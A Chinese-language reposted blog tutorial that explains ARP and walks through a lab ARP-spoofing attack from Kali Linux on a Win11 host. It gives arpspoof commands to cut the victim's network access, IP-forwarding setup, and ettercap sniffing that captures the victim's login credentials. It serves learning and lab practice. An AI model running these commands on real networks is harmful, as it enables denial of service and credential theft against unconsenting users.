iis服务器助手广告广告
返回顶部
首页 > 资讯 > 服务器 >Kali ARP断网攻击与流量监听
  • 141
分享到

Kali ARP断网攻击与流量监听

网络linux服务器 2023-10-05 08:10:57 141人浏览 独家记忆
摘要

作者:geek_Niko 声明: 本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。 目的: 如何借助Kali linux系统内置的nmap、arpspoof、ettercap等

作者:geek_Niko

声明:

本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。

目的:

如何借助Kali linux系统内置的nmap、arpspoof、ettercap等渗透测试工具对局域网内同个网段的PC主机进行ARP欺骗和流量监听,实现断网攻击、密码窃取等

工具:
工具说明
nmap网络扫描工具,用于扫描局域网存活设备和开放端口与对应开启的服务
arpspoofARP欺骗工具,可毒化受害者ARP缓存,将网关Mac地址替换为攻击者MAC
ettercap网络抓包工具,利用ARP协议的缺陷进行中间人攻击,嗅探局域网数据流量
实验环境:
主机IP地址
Kali Linux192.168.2.208
Win11物理机192.168.2.223

备注:Kali Linux虚拟机使用桥接模式与Win11物理机处于同一局域网下

🚀ARP欺骗原理

1、ARP协议

​ 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个tcp/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存。

2、ARP工作过程

​ 假设主机A和B在同一个网段,主机A要向主机B发送信息,具体的地址解析过程如下:

  1. 主机A首先查看自己的ARP缓存表,确定其中是否包含有主机B对应的ARP表项。如果找到了对应的MAC地址,则主机A直接利用ARP表中的MAC地址,对IP数据包进行帧封装,并将数据包发送给主机B。
  2. 如果主机A在ARP表中找不到对应的MAC地址,则将缓存该数据报文,然后以广播方式发送一个ARP请求报文。ARP请求报文中的发送端IP地址和发送端MAC地址为主机A的IP地址和MAC地址,目标IP地址和目标MAC地址为主机B的IP地址和全0的MAC地址。由于ARP请求报文以广播方式发送,该网段上的所有主机都可以接收到该请求,但只有被请求的主机(即主机B)会对该请求进行处理。
  3. 主机B比较自己的IP地址和ARP请求报文中的目标IP地址,当两者相同时进行如下处理:将ARP请求报文中的发送端(即主机A)的IP地址和MAC地址存入自己的ARP表中。之后以单播方式发送ARP响应报文给主机A,其中包含了自己的MAC地址。
  4. 主机A收到ARP响应报文后,将主机B的MAC地址加入到自己的ARP表中以用于后续报文的转发,同时将IP数据包进行封装后发送出去。

​ 当主机A和主机B不在同一网段时,主机A就会先向网关发出ARP请求,ARP请求报文中的目标IP地址为网关的IP地址。当主机A从收到的响应报文中获得网关的MAC地址后,将报文封装并发给网关。如果网关没有主机B的ARP表项,网关会广播ARP请求,目标IP地址为主机B的IP地址,当网关从收到的响应报文中获得主机B的MAC地址后,就可以将报文发给主机B;如果网关已经有主机B的ARP表项,网关直接把报文发给主机B。

3、ARP欺骗

​ 地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。

​ 由于ARP缓存表不是实时更新的,如果在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

一、断网攻击

1、设置Kali虚拟机网络为桥接模式并查看ip地址和网关

#ifconfig

请添加图片描述

#route -n
请添加图片描述

2、使用nmap扫描局域网存活主机与信息

#nmap -sP 192.168.2.0/24

请添加图片描述

3、运行arpspoof工具实现ARP断网攻击

#arpspoof -i eth0 -t 192.168.2.223(目标IP) 192.168.2.1(网关IP)

请添加图片描述

4、结果
未攻击前正常上网

请添加图片描述

攻击开始后win11主机无法上网

请添加图片描述
请添加图片描述

关闭攻击后网络恢复

请添加图片描述

二、流量监听

1、修改端口转发配置
1)临时修改
a)修改参数

#sysctl -w net.ipv4.ip_forward=1

请添加图片描述

b)更新系统配置

sysctl -p

2)永久修改
a)使用vim修改/etc/sysctl.conf配置文件

#vim /etc/sysctl.conf

b)添加修改内容
net.ipv4.ip_forward=1 #开机端口转发功能
c)更新系统配置

#sysctl -p

2、运行arpspoof攻击,实现流量转发代理

#arpspoof -i eth0 -t 192.168.2.1(网关IP) 192.168.2.223(目标IP)

请添加图片描述

win11靶机联网正常,端口转发成功

请添加图片描述

3、ettercap窃听数据

注:需开启新的终端

1)开始窃听

#ettercap -Tq -i eth0

请添加图片描述

2)靶机win11上打开一个网站,并且输入账号密码进行登录

请添加图片描述

3)成功窃听到对应靶机发出的请求数据

请添加图片描述

4)ettercap用法
选项描述
-l显示可用网卡接口设备
-i选择接口
-t协议选择,tcp/udp/all,默认all
-p不进行毒化攻击,用于嗅探本地数据包
-L载入过滤器文件
-Vtext 将数据包以文本形式显示在屏幕上
-Lfilename 把所有的数据包保存下来(保存后的文件只能用etterlog显示)
🚀本次演示到此结束🚀

来源地址:https://blog.csdn.net/m0_53533877/article/details/130126648

--结束END--

本文标题: Kali ARP断网攻击与流量监听

本文链接: https://www.lsjlt.com/news/423654.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • Kali ARP断网攻击与流量监听
    作者:geek_Niko 声明: 本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。 目的: 如何借助Kali Linux系统内置的nmap、arpspoof、ettercap等...
    99+
    2023-10-05
    网络 linux 服务器
  • 局域网arp断网攻击怎么彻底解决
    局域网ARP断网攻击是一种恶意攻击行为,攻击者会发送伪造的ARP包来欺骗目标设备,导致目标设备无法正常访问网络。解决此问题需要采取以...
    99+
    2023-06-03
    arp断网攻击
  • 浅析ARP断网、欺骗攻击及防御方法
    一、ARP断网、欺骗攻击 1、ARP欺骗概述         ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,...
    99+
    2023-10-25
    网络 服务器 运维
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作